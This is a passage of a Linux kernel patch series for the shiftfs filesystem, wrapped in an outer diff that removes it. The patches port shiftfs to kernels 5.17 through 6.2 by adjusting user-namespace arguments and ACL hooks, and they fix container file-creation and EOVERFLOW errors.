-index f5f6d8d8144e..76c54bc12018 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -308,7 +308,8 @@ static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
- 	return p;
- }
- 
--static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
-+static int shiftfs_setxattr(struct user_namespace *ns,
-+			    struct dentry *dentry, struct inode *inode,
- 			    const char *name, const void *value,
- 			    size_t size, int flags)
- {
-@@ -317,7 +318,7 @@ static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
- 	const struct cred *oldcred;
- 
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
--	err = vfs_setxattr(lowerd, name, value, size, flags);
-+	err = vfs_setxattr(ns, lowerd, name, value, size, flags);
- 	revert_creds(oldcred);
- 
- 	shiftfs_copyattr(lowerd->d_inode, inode);
-@@ -334,7 +335,7 @@ static int shiftfs_xattr_get(const struct xattr_handler *handler,
- 	const struct cred *oldcred;
- 
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
--	err = vfs_getxattr(lowerd, name, value, size);
-+	err = vfs_getxattr(&init_user_ns, lowerd, name, value, size);
- 	revert_creds(oldcred);
- 
- 	return err;
-@@ -354,14 +355,15 @@ static ssize_t shiftfs_listxattr(struct dentry *dentry, char *list,
- 	return err;
- }
- 
--static int shiftfs_removexattr(struct dentry *dentry, const char *name)
-+static int shiftfs_removexattr(struct user_namespace *ns,
-+			       struct dentry *dentry, const char *name)
- {
- 	struct dentry *lowerd = dentry->d_fsdata;
- 	int err;
- 	const struct cred *oldcred;
- 
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
--	err = vfs_removexattr(lowerd, name);
-+	err = vfs_removexattr(ns, lowerd, name);
- 	revert_creds(oldcred);
- 
- 	/* update c/mtime */
-@@ -371,13 +373,14 @@ static int shiftfs_removexattr(struct dentry *dentry, const char *name)
- }
- 
- static int shiftfs_xattr_set(const struct xattr_handler *handler,
-+			     struct user_namespace *ns,
- 			     struct dentry *dentry, struct inode *inode,
- 			     const char *name, const void *value, size_t size,
- 			     int flags)
- {
- 	if (!value)
--		return shiftfs_removexattr(dentry, name);
--	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
-+		return shiftfs_removexattr(ns, dentry, name);
-+	return shiftfs_setxattr(ns, dentry, inode, name, value, size, flags);
- }
- 
- static int shiftfs_inode_test(struct inode *inode, void *data)
-@@ -391,7 +394,8 @@ static int shiftfs_inode_set(struct inode *inode, void *data)
- 	return 0;
- }
- 
--static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
-+static int shiftfs_create_object(struct user_namespace *ns,
-+				 struct inode *diri, struct dentry *dentry,
- 				 umode_t mode, const char *symlink,
- 				 struct dentry *hardlink, bool excl)
- {
-@@ -453,7 +457,7 @@ static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
- 		inode->i_state |= I_CREATING;
- 		spin_unlock(&inode->i_lock);
- 
--		inode_init_owner(inode, diri, mode);
-+		inode_init_owner(ns, inode, diri, mode);
- 		modei = inode->i_mode;
- 	}
- 
-@@ -464,22 +468,22 @@ static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
- 
- 	if (hardlink) {
- 		lowerd_link = hardlink->d_fsdata;
--		err = vfs_link(lowerd_link, loweri_dir, lowerd_new, NULL);
-+		err = vfs_link(lowerd_link, ns, loweri_dir, lowerd_new, NULL);
- 	} else {
- 		switch (modei & S_IFMT) {
- 		case S_IFDIR:
--			err = vfs_mkdir(loweri_dir, lowerd_new, modei);
-+			err = vfs_mkdir(ns, loweri_dir, lowerd_new, modei);
- 			break;
- 		case S_IFREG:
--			err = vfs_create(loweri_dir, lowerd_new, modei, excl);
-+			err = vfs_create(ns, loweri_dir, lowerd_new, modei, excl);
- 			break;
- 		case S_IFLNK:
--			err = vfs_symlink(loweri_dir, lowerd_new, symlink);
-+			err = vfs_symlink(ns, loweri_dir, lowerd_new, symlink);
- 			break;
- 		case S_IFSOCK:
- 			/* fall through */
- 		case S_IFIFO:
--			err = vfs_mknod(loweri_dir, lowerd_new, modei, 0);
-+			err = vfs_mknod(ns, loweri_dir, lowerd_new, modei, 0);
- 			break;
- 		default:
- 			err = -EINVAL;
-@@ -535,41 +539,43 @@ static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
- 	return err;
- }
- 
--static int shiftfs_create(struct inode *dir, struct dentry *dentry,
-+static int shiftfs_create(struct user_namespace *ns,
-+			  struct inode *dir, struct dentry *dentry,
- 			  umode_t mode,  bool excl)
- {
- 	mode |= S_IFREG;
- 
--	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, excl);
-+	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, excl);
- }
- 
--static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry,
-+static int shiftfs_mkdir(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
- 			 umode_t mode)
- {
- 	mode |= S_IFDIR;
- 
--	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
-+	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false);
- }
- 
- static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
- 			struct dentry *dentry)
- {
--	return shiftfs_create_object(dir, dentry, 0, NULL, hardlink, false);
-+	return shiftfs_create_object(&init_user_ns, dir, dentry, 0, NULL, hardlink, false);
- }
- 
--static int shiftfs_mknod(struct inode *dir, struct dentry *dentry, umode_t mode,
-+static int shiftfs_mknod(struct user_namespace *ns,
-+			 struct inode *dir, struct dentry *dentry, umode_t mode,
- 			 dev_t rdev)
- {
- 	if (!S_ISFIFO(mode) && !S_ISSOCK(mode))
- 		return -EPERM;
- 
--	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
-+	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false);
- }
- 
--static int shiftfs_symlink(struct inode *dir, struct dentry *dentry,
-+static int shiftfs_symlink(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
- 			   const char *symlink)
- {
--	return shiftfs_create_object(dir, dentry, S_IFLNK, symlink, NULL, false);
-+	return shiftfs_create_object(ns, dir, dentry, S_IFLNK, symlink, NULL, false);
- }
- 
- static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
-@@ -584,9 +590,9 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
- 	inode_lock_nested(loweri, I_MUTEX_PARENT);
- 	if (rmdir)
--		err = vfs_rmdir(loweri, lowerd);
-+		err = vfs_rmdir(&init_user_ns, loweri, lowerd);
- 	else
--		err = vfs_unlink(loweri, lowerd, NULL);
-+		err = vfs_unlink(&init_user_ns, loweri, lowerd, NULL);
- 	revert_creds(oldcred);
- 
- 	if (!err) {
-@@ -615,7 +621,8 @@ static int shiftfs_rmdir(struct inode *dir, struct dentry *dentry)
- 	return shiftfs_rm(dir, dentry, true);
- }
- 
--static int shiftfs_rename(struct inode *olddir, struct dentry *old,
-+static int shiftfs_rename(struct user_namespace *ns,
-+			  struct inode *olddir, struct dentry *old,
- 			  struct inode *newdir, struct dentry *new,
- 			  unsigned int flags)
- {
-@@ -625,6 +632,14 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
- 		      *trapd;
- 	struct inode *loweri_dir_old = lowerd_dir_old->d_inode,
- 		     *loweri_dir_new = lowerd_dir_new->d_inode;
-+	struct renamedata rd = {
-+		.old_mnt_userns	= ns,
-+		.old_dir	= loweri_dir_old,
-+		.old_dentry	= lowerd_old,
-+		.new_mnt_userns	= ns,
-+		.new_dir	= loweri_dir_new,
-+		.new_dentry	= lowerd_new,
-+	};
- 	int err = -EINVAL;
- 	const struct cred *oldcred;
- 
-@@ -634,8 +649,7 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
- 		goto out_unlock;
- 
- 	oldcred = shiftfs_override_creds(old->d_sb);
--	err = vfs_rename(loweri_dir_old, lowerd_old, loweri_dir_new, lowerd_new,
--			 NULL, flags);
-+	err = vfs_rename(&rd);
- 	revert_creds(oldcred);
- 
- 	shiftfs_copyattr(loweri_dir_old, olddir);
-@@ -691,7 +705,7 @@ static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry,
- 	return d_splice_alias(inode, dentry);
- }
- 
--static int shiftfs_permission(struct inode *inode, int mask)
-+static int shiftfs_permission(struct user_namespace *ns, struct inode *inode, int mask)
- {
- 	int err;
- 	const struct cred *oldcred;
-@@ -702,12 +716,12 @@ static int shiftfs_permission(struct inode *inode, int mask)
- 		return -ECHILD;
- 	}
- 
--	err = generic_permission(inode, mask);
-+	err = generic_permission(ns, inode, mask);
- 	if (err)
- 		return err;
- 
- 	oldcred = shiftfs_override_creds(inode->i_sb);
--	err = inode_permission(loweri, mask);
-+	err = inode_permission(ns, loweri, mask);
- 	revert_creds(oldcred);
- 
- 	return err;
-@@ -733,7 +747,8 @@ static int shiftfs_fiemap(struct inode *inode,
- 	return err;
- }
- 
--static int shiftfs_tmpfile(struct inode *dir, struct dentry *dentry,
-+static int shiftfs_tmpfile(struct user_namespace *ns,
-+			   struct inode *dir, struct dentry *dentry,
- 			   umode_t mode)
- {
- 	int err;
-@@ -745,13 +760,13 @@ static int shiftfs_tmpfile(struct inode *dir, struct dentry *dentry,
- 		return -EOPNOTSUPP;
- 
- 	oldcred = shiftfs_override_creds(dir->i_sb);
--	err = loweri->i_op->tmpfile(loweri, lowerd, mode);
-+	err = loweri->i_op->tmpfile(ns, loweri, lowerd, mode);
- 	revert_creds(oldcred);
- 
- 	return err;
- }
- 
--static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
-+static int shiftfs_setattr(struct user_namespace *ns, struct dentry *dentry, struct iattr *attr)
- {
- 	struct dentry *lowerd = dentry->d_fsdata;
- 	struct inode *loweri = lowerd->d_inode;
-@@ -761,7 +776,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- 	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
- 	int err;
- 
--	err = setattr_prepare(dentry, attr);
-+	err = setattr_prepare(ns, dentry, attr);
- 	if (err)
- 		return err;
- 
-@@ -778,7 +793,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- 
- 	inode_lock(loweri);
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
--	err = notify_change(lowerd, &newattr, NULL);
-+	err = notify_change(ns, lowerd, &newattr, NULL);
- 	revert_creds(oldcred);
- 	inode_unlock(loweri);
- 
-@@ -787,7 +802,8 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- 	return err;
- }
- 
--static int shiftfs_getattr(const struct path *path, struct kstat *stat,
-+static int shiftfs_getattr(struct user_namespace *ns,
-+			   const struct path *path, struct kstat *stat,
- 			   u32 request_mask, unsigned int query_flags)
- {
- 	struct inode *inode = path->dentry->d_inode;
-@@ -870,9 +886,9 @@ shift_acl_xattr_ids(struct user_namespace *from, struct user_namespace *to,
- 			entry->e_id = cpu_to_le32(from_kuid(&init_user_ns, kuid));
- 			break;
- 		case ACL_GROUP:
--			kgid = make_kgid(&init_user_ns, le32_to_cpu(entry->e_id));
-+			kgid = make_kgid(from, le32_to_cpu(entry->e_id));
- 			kgid = shift_kgid(from, to, kgid);
--			entry->e_id = cpu_to_le32(from_kgid(&init_user_ns, kgid));
-+			entry->e_id = cpu_to_le32(from_kgid(from, kgid));
- 			break;
- 		default:
- 			break;
-@@ -880,7 +896,8 @@ shift_acl_xattr_ids(struct user_namespace *from, struct user_namespace *to,
- 	}
- }
- 
--static struct posix_acl *shiftfs_get_acl(struct inode *inode, int type)
-+static struct posix_acl *
-+shiftfs_get_acl(struct inode *inode, int type, bool rcu)
- {
- 	struct inode *loweri = inode->i_private;
- 	const struct cred *oldcred;
-@@ -890,6 +907,9 @@ static struct posix_acl *shiftfs_get_acl(struct inode *inode, int type)
- 	int size;
- 	int err;
- 
-+	if (rcu)
-+		return ERR_PTR(-ECHILD);
-+
- 	if (!IS_POSIXACL(loweri))
- 		return NULL;
- 
-@@ -941,6 +961,7 @@ shiftfs_posix_acl_xattr_get(const struct xattr_handler *handler,
- 
- static int
- shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
-+			    struct user_namespace *ns,
- 			    struct dentry *dentry, struct inode *inode,
- 			    const char *name, const void *value,
- 			    size_t size, int flags)
-@@ -952,17 +973,17 @@ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
- 		return -EOPNOTSUPP;
- 	if (handler->flags == ACL_TYPE_DEFAULT && !S_ISDIR(inode->i_mode))
- 		return value ? -EACCES : 0;
--	if (!inode_owner_or_capable(inode))
-+	if (!inode_owner_or_capable(ns, inode))
- 		return -EPERM;
- 
- 	if (value) {
- 		shift_acl_xattr_ids(inode->i_sb->s_user_ns,
- 				    loweri->i_sb->s_user_ns,
- 				    (void *)value, size);
--		err = shiftfs_setxattr(dentry, inode, handler->name, value,
-+		err = shiftfs_setxattr(ns, dentry, inode, handler->name, value,
- 				       size, flags);
- 	} else {
--		err = shiftfs_removexattr(dentry, handler->name);
-+		err = shiftfs_removexattr(ns, dentry, handler->name);
- 	}
- 
- 	if (!err)
--- 
-2.39.2
-
-From df4546ab77323af5bd40996244af7ade6c99054b Mon Sep 17 00:00:00 2001
-From: Andrea Righi <andrea.righi@canonical.com>
-Date: Wed, 13 Apr 2022 15:26:22 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: always rely on init_user_ns
-Cc: mpagano@gentoo.org
-
-With the porting of shiftfs from 5.15 to 5.17, some filesystem-related
-functions now take a struct user_namespace argument; shiftfs logic,
-however, still relies on these functions operating in the main
-filesystem namespace.
-
-Make sure to always use init_user_ns to prevent breakage of system
-components that rely on shiftfs.
-
-Without this fix lxd showed issues such as failing to create any file
-inside a container when shiftfs was used (e.g., with zfs as the
-storage pool).
-
-Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 50 ++++++++++++++++++++++++--------------------------
- 1 file changed, 24 insertions(+), 26 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 76c54bc12018..a21624c529f0 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -308,8 +308,7 @@ static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
- 	return p;
- }
- 
--static int shiftfs_setxattr(struct user_namespace *ns,
--			    struct dentry *dentry, struct inode *inode,
-+static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
- 			    const char *name, const void *value,
- 			    size_t size, int flags)
- {
-@@ -318,7 +317,7 @@ static int shiftfs_setxattr(struct user_namespace *ns,
- 	const struct cred *oldcred;
- 
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
--	err = vfs_setxattr(ns, lowerd, name, value, size, flags);
-+	err = vfs_setxattr(&init_user_ns, lowerd, name, value, size, flags);
- 	revert_creds(oldcred);
- 
- 	shiftfs_copyattr(lowerd->d_inode, inode);
-@@ -363,7 +362,7 @@ static int shiftfs_removexattr(struct user_namespace *ns,
- 	const struct cred *oldcred;
- 
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
--	err = vfs_removexattr(ns, lowerd, name);
-+	err = vfs_removexattr(&init_user_ns, lowerd, name);
- 	revert_creds(oldcred);
- 
- 	/* update c/mtime */
-@@ -379,8 +378,8 @@ static int shiftfs_xattr_set(const struct xattr_handler *handler,
- 			     int flags)
- {
- 	if (!value)
--		return shiftfs_removexattr(ns, dentry, name);
--	return shiftfs_setxattr(ns, dentry, inode, name, value, size, flags);
-+		return shiftfs_removexattr(&init_user_ns, dentry, name);
-+	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
- }
- 
- static int shiftfs_inode_test(struct inode *inode, void *data)
-@@ -394,8 +393,7 @@ static int shiftfs_inode_set(struct inode *inode, void *data)
- 	return 0;
- }
- 
--static int shiftfs_create_object(struct user_namespace *ns,
--				 struct inode *diri, struct dentry *dentry,
-+static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
- 				 umode_t mode, const char *symlink,
- 				 struct dentry *hardlink, bool excl)
- {
-@@ -457,7 +455,7 @@ static int shiftfs_create_object(struct user_namespace *ns,
- 		inode->i_state |= I_CREATING;
- 		spin_unlock(&inode->i_lock);
- 
--		inode_init_owner(ns, inode, diri, mode);
-+		inode_init_owner(&init_user_ns, inode, diri, mode);
- 		modei = inode->i_mode;
- 	}
- 
-@@ -468,22 +466,22 @@ static int shiftfs_create_object(struct user_namespace *ns,
- 
- 	if (hardlink) {
- 		lowerd_link = hardlink->d_fsdata;
--		err = vfs_link(lowerd_link, ns, loweri_dir, lowerd_new, NULL);
-+		err = vfs_link(lowerd_link, &init_user_ns, loweri_dir, lowerd_new, NULL);
- 	} else {
- 		switch (modei & S_IFMT) {
- 		case S_IFDIR:
--			err = vfs_mkdir(ns, loweri_dir, lowerd_new, modei);
-+			err = vfs_mkdir(&init_user_ns, loweri_dir, lowerd_new, modei);
- 			break;
- 		case S_IFREG:
--			err = vfs_create(ns, loweri_dir, lowerd_new, modei, excl);
-+			err = vfs_create(&init_user_ns, loweri_dir, lowerd_new, modei, excl);
- 			break;
- 		case S_IFLNK:
--			err = vfs_symlink(ns, loweri_dir, lowerd_new, symlink);
-+			err = vfs_symlink(&init_user_ns, loweri_dir, lowerd_new, symlink);
- 			break;
- 		case S_IFSOCK:
- 			/* fall through */
- 		case S_IFIFO:
--			err = vfs_mknod(ns, loweri_dir, lowerd_new, modei, 0);
-+			err = vfs_mknod(&init_user_ns, loweri_dir, lowerd_new, modei, 0);
- 			break;
- 		default:
- 			err = -EINVAL;
-@@ -545,7 +543,7 @@ static int shiftfs_create(struct user_namespace *ns,
- {
- 	mode |= S_IFREG;
- 
--	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, excl);
-+	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, excl);
- }
- 
- static int shiftfs_mkdir(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
-@@ -553,13 +551,13 @@ static int shiftfs_mkdir(struct user_namespace *ns, struct inode *dir, struct de
- {
- 	mode |= S_IFDIR;
- 
--	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false);
-+	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
- }
- 
- static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
- 			struct dentry *dentry)
- {
--	return shiftfs_create_object(&init_user_ns, dir, dentry, 0, NULL, hardlink, false);
-+	return shiftfs_create_object(dir, dentry, 0, NULL, hardlink, false);
- }
- 
- static int shiftfs_mknod(struct user_namespace *ns,
-@@ -569,13 +567,13 @@ static int shiftfs_mknod(struct user_namespace *ns,
- 	if (!S_ISFIFO(mode) && !S_ISSOCK(mode))
- 		return -EPERM;
- 
--	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false);
-+	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
- }
- 
- static int shiftfs_symlink(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
- 			   const char *symlink)
- {
--	return shiftfs_create_object(ns, dir, dentry, S_IFLNK, symlink, NULL, false);
-+	return shiftfs_create_object(dir, dentry, S_IFLNK, symlink, NULL, false);
- }
- 
- static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
-@@ -716,12 +714,12 @@ static int shiftfs_permission(struct user_namespace *ns, struct inode *inode, in
- 		return -ECHILD;
- 	}
- 
--	err = generic_permission(ns, inode, mask);
-+	err = generic_permission(&init_user_ns, inode, mask);
- 	if (err)
- 		return err;
- 
- 	oldcred = shiftfs_override_creds(inode->i_sb);
--	err = inode_permission(ns, loweri, mask);
-+	err = inode_permission(&init_user_ns, loweri, mask);
- 	revert_creds(oldcred);
- 
- 	return err;
-@@ -760,7 +758,7 @@ static int shiftfs_tmpfile(struct user_namespace *ns,
- 		return -EOPNOTSUPP;
- 
- 	oldcred = shiftfs_override_creds(dir->i_sb);
--	err = loweri->i_op->tmpfile(ns, loweri, lowerd, mode);
-+	err = loweri->i_op->tmpfile(&init_user_ns, loweri, lowerd, mode);
- 	revert_creds(oldcred);
- 
- 	return err;
-@@ -776,7 +774,7 @@ static int shiftfs_setattr(struct user_namespace *ns, struct dentry *dentry, str
- 	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
- 	int err;
- 
--	err = setattr_prepare(ns, dentry, attr);
-+	err = setattr_prepare(&init_user_ns, dentry, attr);
- 	if (err)
- 		return err;
- 
-@@ -793,7 +791,7 @@ static int shiftfs_setattr(struct user_namespace *ns, struct dentry *dentry, str
- 
- 	inode_lock(loweri);
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
--	err = notify_change(ns, lowerd, &newattr, NULL);
-+	err = notify_change(&init_user_ns, lowerd, &newattr, NULL);
- 	revert_creds(oldcred);
- 	inode_unlock(loweri);
- 
-@@ -980,10 +978,10 @@ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
- 		shift_acl_xattr_ids(inode->i_sb->s_user_ns,
- 				    loweri->i_sb->s_user_ns,
- 				    (void *)value, size);
--		err = shiftfs_setxattr(ns, dentry, inode, handler->name, value,
-+		err = shiftfs_setxattr(dentry, inode, handler->name, value,
- 				       size, flags);
- 	} else {
--		err = shiftfs_removexattr(ns, dentry, handler->name);
-+		err = shiftfs_removexattr(&init_user_ns, dentry, handler->name);
- 	}
- 
- 	if (!err)
--- 
-2.39.2
-
-From 3d0ac0887b4a57d883d194a6836501fa77aaf6e3 Mon Sep 17 00:00:00 2001
-From: Andrea Righi <andrea.righi@canonical.com>
-Date: Wed, 27 Apr 2022 18:20:41 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix missing include required in 5.18
-Cc: mpagano@gentoo.org
-
-Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index a21624c529f0..a5338dc6290c 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -21,6 +21,7 @@
- #include <linux/posix_acl_xattr.h>
- #include <linux/uio.h>
- #include <linux/fiemap.h>
-+#include <linux/pagemap.h>
- 
- struct shiftfs_super_info {
- 	struct vfsmount *mnt;
--- 
-2.39.2
-
-From 6cbfd564842eeb9adb495a3de704d125418825f9 Mon Sep 17 00:00:00 2001
-From: Andrea Righi <andrea.righi@canonical.com>
-Date: Tue, 18 Oct 2022 17:09:12 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support kernel 6.1
-Cc: mpagano@gentoo.org
-
-Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 5 ++---
- 1 file changed, 2 insertions(+), 3 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index a5338dc6290c..34f080ae0fec 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -747,19 +747,18 @@ static int shiftfs_fiemap(struct inode *inode,
- }
- 
- static int shiftfs_tmpfile(struct user_namespace *ns,
--			   struct inode *dir, struct dentry *dentry,
-+			   struct inode *dir, struct file *file,
- 			   umode_t mode)
- {
- 	int err;
- 	const struct cred *oldcred;
--	struct dentry *lowerd = dentry->d_fsdata;
- 	struct inode *loweri = dir->i_private;
- 
- 	if (!loweri->i_op->tmpfile)
- 		return -EOPNOTSUPP;
- 
- 	oldcred = shiftfs_override_creds(dir->i_sb);
--	err = loweri->i_op->tmpfile(&init_user_ns, loweri, lowerd, mode);
-+	err = loweri->i_op->tmpfile(&init_user_ns, loweri, file, mode);
- 	revert_creds(oldcred);
- 
- 	return err;
--- 
-2.39.2
-
-From a04c96a9da98441b39fd8425d19d2ae6d92c0bf9 Mon Sep 17 00:00:00 2001
-From: Andrea Righi <andrea.righi@canonical.com>
-Date: Wed, 4 Jan 2023 10:25:30 +0100
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support linux 6.2
-Cc: mpagano@gentoo.org
-
-Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 8 ++++----
- 1 file changed, 4 insertions(+), 4 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 34f080ae0fec..cda74b614505 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -912,7 +912,7 @@ shiftfs_get_acl(struct inode *inode, int type, bool rcu)
- 		return NULL;
- 
- 	oldcred = shiftfs_override_creds(inode->i_sb);
--	lower_acl = get_acl(loweri, type);
-+	lower_acl = get_inode_acl(loweri, type);
- 	revert_creds(oldcred);
- 
- 	if (lower_acl && !IS_ERR(lower_acl)) {
-@@ -1026,13 +1026,13 @@ static const struct inode_operations shiftfs_dir_inode_operations = {
- 	.permission	= shiftfs_permission,
- 	.getattr	= shiftfs_getattr,
- 	.listxattr	= shiftfs_listxattr,
--	.get_acl	= shiftfs_get_acl,
-+	.get_inode_acl	= shiftfs_get_acl,
- };
- 
- static const struct inode_operations shiftfs_file_inode_operations = {
- 	.fiemap		= shiftfs_fiemap,
- 	.getattr	= shiftfs_getattr,
--	.get_acl	= shiftfs_get_acl,
-+	.get_inode_acl	= shiftfs_get_acl,
- 	.listxattr	= shiftfs_listxattr,
- 	.permission	= shiftfs_permission,
- 	.setattr	= shiftfs_setattr,
-@@ -1041,7 +1041,7 @@ static const struct inode_operations shiftfs_file_inode_operations = {
- 
- static const struct inode_operations shiftfs_special_inode_operations = {
- 	.getattr	= shiftfs_getattr,
--	.get_acl	= shiftfs_get_acl,
-+	.get_inode_acl	= shiftfs_get_acl,
- 	.listxattr	= shiftfs_listxattr,
- 	.permission	= shiftfs_permission,
- 	.setattr	= shiftfs_setattr,
--- 
-2.39.2
-
-From 63014ad24c3b175e503324461ded0a6a8ed12ab6 Mon Sep 17 00:00:00 2001
-From: Alexander Mikhalitsyn <aleksandr.mikhalitsyn@canonical.com>
-Date: Tue, 31 Jan 2023 17:11:48 +0100
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix -EOVERFLOW inside the container
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1990849
-
-We have never supported idmapped layers with shiftfs and, moreover, that makes
-no sense: once the lower fs supports idmapped mounts, shiftfs is not needed.
-
-Starting from linux-image-5.15.0-48-generic, users started seeing EOVERFLOW
-errors from the userspace side on trivial fs operations inside containers.
-
-This is caused by the patches ("fs: tweak fsuidgid_has_mapping()") and
-("fs: support mapped mounts of mapped filesystems"). These patches extend
-and enable idmapped mounts support in the Ubuntu kernel, but the problem is
-that shiftfs was not properly ported.
-
-See also:
-("namei: prepare for idmapped mounts")
-https://lore.kernel.org/all/20210121131959.646623-15-christian.brauner@ubuntu.com/
-("overlayfs: do not mount on top of idmapped mounts")
-https://lore.kernel.org/all/20210121131959.646623-29-christian.brauner@ubuntu.com/
-as a reference.
-
-This patch should be applied on top of kinetic/master-next and is based on the
-changes by Andrea Righi in 4c934edc66 ("UBUNTU: SAUCE: shiftfs: always rely on init_user_ns")
-
-This commit, together with 4c934edc66 ("UBUNTU: SAUCE: shiftfs: always rely on init_user_ns"),
-has to be ported to the jammy tree too.
-
-Fixes: d347e71d2c0 ("UBUNTU: [SAUCE] shiftfs: support kernel 5.15")
-Reported-by: Thomas Parrott <thomas.parrott@canonical.com>
-Signed-off-by: Alexander Mikhalitsyn <aleksandr.mikhalitsyn@canonical.com>
-Acked-by: Tim Gardner <tim.gardner@canonical.com>
-Acked-by: Andrea Righi <andrea.righi@canonical.com>
-Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 16 +++++++++++++---
- 1 file changed, 13 insertions(+), 3 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index cda74b614505..2664e1fb65d3 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -632,10 +632,10 @@ static int shiftfs_rename(struct user_namespace *ns,
- 	struct inode *loweri_dir_old = lowerd_dir_old->d_inode,
- 		     *loweri_dir_new = lowerd_dir_new->d_inode;
- 	struct renamedata rd = {
--		.old_mnt_userns	= ns,
-+		.old_mnt_userns	= &init_user_ns,
- 		.old_dir	= loweri_dir_old,
- 		.old_dentry	= lowerd_old,
--		.new_mnt_userns	= ns,
-+		.new_mnt_userns	= &init_user_ns,
- 		.new_dir	= loweri_dir_new,
- 		.new_dentry	= lowerd_new,
- 	};
-@@ -971,7 +971,7 @@ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
- 		return -EOPNOTSUPP;
- 	if (handler->flags == ACL_TYPE_DEFAULT && !S_ISDIR(inode->i_mode))
- 		return value ? -EACCES : 0;
--	if (!inode_owner_or_capable(ns, inode))
-+	if (!inode_owner_or_capable(&init_user_ns, inode))
- 		return -EPERM;
- 
- 	if (value) {
-@@ -2015,6 +2015,16 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 		goto out_put_path;
- 	}
- 
-+	/*
-+	 * It makes no sense to handle idmapped layers from shiftfs.
-+	 * And we didn't support it properly anyway.
-+	 */
-+	if (is_idmapped_mnt(path.mnt)) {
-+		err = -EINVAL;
-+		pr_err("idmapped layers are currently not supported\n");
-+		goto out_put_path;
-+	}
-+
- 	sb->s_flags |= SB_POSIXACL;
- 
- 	if (sbinfo->mark) {
--- 
-2.39.2
-
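
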